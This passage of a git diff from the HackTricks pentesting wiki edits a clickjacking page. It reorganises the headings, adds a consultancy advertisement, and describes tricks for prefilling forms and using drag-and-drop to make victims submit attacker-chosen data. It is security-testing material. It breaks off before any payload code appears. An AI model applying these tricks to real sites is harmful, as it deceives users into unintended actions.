consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %}
@@ -147,5 +170,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md index be0e6cc9a..ea72f9516 100644 --- a/pentesting-web/clickjacking.md +++ b/pentesting-web/clickjacking.md @@ -1,4 +1,4 @@ - +# Clickjacking
@@ -16,20 +16,27 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} + -# What is Clickjacking +Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. + +{% embed url="https://securityhubs.io/" %} +{% endhint %} + +## What is Clickjacking Clickjacking is an attack that **tricks** a **user** into **clicking** a webpage **element** which is **invisible** or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. (From [here](https://www.imperva.com/learn/application-security/clickjacking/)). -## Prepopulate forms trick +### Prepopulate forms trick Sometimes is possible to **fill the value of fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit. -## Populate form with Drag\&Drop +### Populate form with Drag\&Drop If you need the user to **fill a form** but you don't want to directly ask him to write some specific information (like your email or and specific password that you know), you can just ask him to **Drag\&Drop** something that will write your controlled data like in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/). -## Basic Payload +### Basic Payload ```markup